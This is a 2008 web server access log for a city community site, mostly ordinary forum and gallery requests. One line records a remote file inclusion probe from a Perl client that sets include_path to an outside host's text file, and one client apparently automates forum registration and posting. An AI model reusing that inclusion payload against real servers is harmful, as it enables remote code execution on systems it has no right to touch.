203.177.74.139 - - [28/Aug/2008:05:16:07 -0700] "GET /forum2/style_images/red_crysta/f_norm_dot.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?s=1c92acb627265fe1921deeb071e74588&showforum=9" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:16:07 -0700] "GET /forum2/index.php?s=85247cb8897d9fc7ae7e6e6c390c9dca&showforum=9 HTTP/1.0" 200 60695 "http://www.sancarloscity.org/forum2/index.php?s=85247cb8897d9fc7ae7e6e6c390c9dca&showforum=9" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:08 -0700] "GET /forum2/style_images/red_crysta/folder_post_icons/icon6.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?s=1c92acb627265fe1921deeb071e74588&showforum=9" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:16:08 -0700] "GET /forum2/index.php?act=post&do=new_post&f=9 HTTP/1.0" 200 8380 "http://www.sancarloscity.org/forum2/index.php?act=post&do=new_post&f=9" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:09 -0700] "GET /forum2/style_images/red_crysta/f_closed.gif HTTP/1.1" 200 91 "http://www.sancarloscity.org/forum2/index.php?s=1c92acb627265fe1921deeb071e74588&showforum=9" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:09 -0700] "GET /forum2/style_images/red_crysta/menu_item.gif HTTP/1.1" 200 87 "http://www.sancarloscity.org/forum2/index.php?s=1c92acb627265fe1921deeb071e74588&showforum=9" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:16:09 -0700] "GET /forum2/index.php?act=Reg&CODE=00&coppa_pass=1 HTTP/1.0" 200 8625 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:16:10 -0700] "GET /picgallery/displayimage.php?album=3&pos=21 HTTP/1.0" 200 13286 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:16:10 -0700] "POST /forum2/index.php?act=Reg&coppa_user=0&termsread=1&coppa_pass=1 HTTP/1.0" 200 17748 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:10 -0700] "GET /forum2/index.php?act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?s=1c92acb627265fe1921deeb071e74588&showforum=9" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:16:11 -0700] "GET /forum2/index.php?act=Reg&CODE=image&rc=7c8f66c80ba01a54c862e4b80aa38a26 HTTP/1.0" 200 3774 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:12 -0700] "GET /forum2/favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:16:12 -0700] "POST /forum2/index.php HTTP/1.0" 200 18078 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:12 -0700] "GET /forum2/favicon.ico HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:16:13 -0700] "GET /forum2/index.php?act=Reg&CODE=image&rc=11a5e0c3c06be1f6b60e47986c53d242 HTTP/1.0" 200 3996 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:16:13 -0700] "POST /forum2/index.php HTTP/1.0" 200 18078 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:16:14 -0700] "GET /forum2/index.php?act=Reg&CODE=00&coppa_pass=1 HTTP/1.0" 200 8625 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:16:15 -0700] "GET /forum2/index.php?act=Reg&CODE=image&rc=e86517bb6e9f8b3aa1dc5aff2155d718 HTTP/1.0" 200 4108 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:16:15 -0700] "GET /sampo/flv/0704/4.jpg HTTP/1.1" 200 14082 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:16:16 -0700] "POST /forum2/index.php HTTP/1.0" 200 18078 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:16:17 -0700] "GET /forum2/index.php?act=Reg&CODE=00&coppa_pass=1 HTTP/1.0" 200 8625 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:16:18 -0700] "GET /forum2/index.php?act=Reg&CODE=image&rc=85561f0f674a42a71123895f90e913ab HTTP/1.0" 200 4292 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:16:18 -0700] "POST /forum2/index.php HTTP/1.0" 200 18078 "http://www.sancarloscity.org/forum2/index.php?act=Reg&CODE=00&coppa_pass=1" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:16:19 -0700] "GET /forum2/index.php?act=Login&CODE=00 HTTP/1.0" 200 9282 "http://www.sancarloscity.org/forum2/index.php?act=Login&CODE=00" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:16:20 -0700] "POST /forum2/index.php?act=Login&CODE=01 HTTP/1.0" 200 9508 "http://www.sancarloscity.org/forum2/index.php?act=Login&CODE=00" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:16:20 -0700] "GET /sampo/flv/0704/5.jpg HTTP/1.1" 200 13747 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:16:21 -0700] "GET /forum2/index.php?act=post&do=new_post&f=9 HTTP/1.0" 200 8380 "http://www.sancarloscity.org/forum2/index.php?act=post&do=new_post&f=9" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:16:21 -0700] "GET /sampo/flv/0704/6.jpg HTTP/1.1" 200 13961 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:16:22 -0700] "GET /forum2/index.php?showforum=9 HTTP/1.0" 200 60695 "http://www.sancarloscity.org/forum2/index.php?showforum=9" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:16:23 -0700] "GET /forum2/index.php?act=post&do=new_post&f=9 HTTP/1.0" 200 8380 "http://www.sancarloscity.org/forum2/index.php?act=post&do=new_post&f=9" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:16:24 -0700] "POST /forum2/index.php HTTP/1.0" 200 9487 "http://www.sancarloscity.org/forum2/index.php?act=post&do=new_post&f=9" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:16:24 -0700] "GET /sampo/thumbs/01.jpg HTTP/1.1" 200 14299 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
72.36.132.226 - - [28/Aug/2008:05:16:24 -0700] "GET /forum2/index.php?showforum=9 HTTP/1.0" 200 60695 "http://www.sancarloscity.org/forum2/index.php?showforum=9" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:32 -0700] "GET /forum2/index.php?s=1c92acb627265fe1921deeb071e74588&showforum=9 HTTP/1.1" 200 12244 "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:36 -0700] "GET /forum2/index.php?act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?s=1c92acb627265fe1921deeb071e74588&showforum=9" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:39 -0700] "GET /forum2/index.php?showtopic=233 HTTP/1.1" 200 8613 "http://www.sancarloscity.org/forum2/index.php?s=1c92acb627265fe1921deeb071e74588&showforum=9" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:16:41 -0700] "GET /sampo/thumbs/02.jpg HTTP/1.1" 200 14487 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:16:42 -0700] "GET /sampo/thumbs/03.jpg HTTP/1.1" 200 14843 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:42 -0700] "GET /forum2/jscripts/ipb_topic.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:16:43 -0700] "GET /sampo/thumbs/04.jpg HTTP/1.1" 200 14378 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:16:45 -0700] "GET /sampo/thumbs/05.jpg HTTP/1.1" 200 14193 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:45 -0700] "GET /forum2/jscripts/ips_text_editor_lite.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:16:46 -0700] "GET /sampo/thumbs/06.jpg HTTP/1.1" 200 14660 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:47 -0700] "GET /forum2/style_images/red_crysta/t_reply.gif HTTP/1.1" 200 1957 "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:47 -0700] "GET /forum2/style_images/red_crysta/folder_profile_portal/user-offline.png HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:47 -0700] "GET /forum2/style_images/red_crysta/folder_profile_portal/pp-blank-thumb.png HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:47 -0700] "GET /forum2/style_images/red_crysta/rating_0_mini.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:16:48 -0700] "GET /sampo/thumbs/07.jpg HTTP/1.1" 200 14410 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:48 -0700] "GET /forum2/style_images/red_crysta/folder_profile_portal/gender_female.png HTTP/1.1" 200 778 "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:48 -0700] "GET /forum2/style_images/red_crysta/folder_profile_portal/friend_add_small.png HTTP/1.1" 200 723 "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:49 -0700] "GET /forum2/style_images/red_crysta/folder_profile_portal/send_pm_small.png HTTP/1.1" 200 793 "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:49 -0700] "GET /forum2/style_images/red_crysta/folder_profile_portal/find_posts.png HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
200.68.51.152 - - [28/Aug/2008:05:16:50 -0700] "GET /logs/access_071127.log//guestbook1//admin.php?include_path=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 781 "-" "libwww-perl/5.805" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:16:51 -0700] "GET /sampo/thumbs/08.jpg HTTP/1.1" 200 14545 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:51 -0700] "GET /forum2/style_images/red_crysta/warn_minus.gif HTTP/1.1" 200 121 "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:51 -0700] "GET /forum2/style_images/red_crysta/warn0.gif HTTP/1.1" 200 213 "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:51 -0700] "GET /forum2/style_images/red_crysta/warn_add.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:51 -0700] "GET /forum2/style_images/red_crysta/spacer.gif HTTP/1.1" 200 43 "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:52 -0700] "GET /forum2/style_images/red_crysta/p_up.gif HTTP/1.1" 200 1402 "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:52 -0700] "GET /forum2/style_images/red_crysta/p_report.gif HTTP/1.1" 200 1601 "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:53 -0700] "GET /forum2/style_images/red_crysta/p_edit.gif HTTP/1.1" 200 1438 "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:53 -0700] "GET /forum2/style_images/red_crysta/p_mq_add.gif HTTP/1.1" 200 1633 "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:16:53 -0700] "GET /sampo/thumbs/09.jpg HTTP/1.1" 200 14387 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:53 -0700] "GET /forum2/style_images/red_crysta/t_qr.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:54 -0700] "GET /forum2/style_images/red_crysta/folder_editor_images/rte-italic.png HTTP/1.1" 200 804 "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:54 -0700] "GET /forum2/style_images/red_crysta/folder_editor_images/rte-underlined.png HTTP/1.1" 200 770 "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:54 -0700] "GET /forum2/style_images/red_crysta/folder_editor_images/rte-bold.png HTTP/1.1" 200 807 "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:55 -0700] "GET /forum2/style_images/red_crysta/folder_editor_images/rte-image-button.png HTTP/1.1" 200 958 "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:16:55 -0700] "GET /sampo/thumbs/10.jpg HTTP/1.1" 200 14470 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:55 -0700] "GET /forum2/style_images/red_crysta/folder_editor_images/rte-emo-button.png HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:56 -0700] "GET /forum2/style_images/red_crysta/folder_editor_images/rte-quote-button.png HTTP/1.1" 200 975 "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:56 -0700] "GET /forum2/style_images/red_crysta/folder_editor_images/rte-link-button.png HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:16:58 -0700] "GET /sampo/thumbs/11.jpg HTTP/1.1" 200 14793 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:58 -0700] "GET /forum2/style_images/red_crysta/folder_editor_images/rte-code-button.png HTTP/1.1" 200 1079 "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:59 -0700] "GET /forum2/style_images/red_crysta/folder_editor_images/rte-resize-up.gif HTTP/1.1" 200 594 "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:16:59 -0700] "GET /forum2/style_images/red_crysta/folder_editor_images/rte-resize-down.gif HTTP/1.1" 200 551 "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
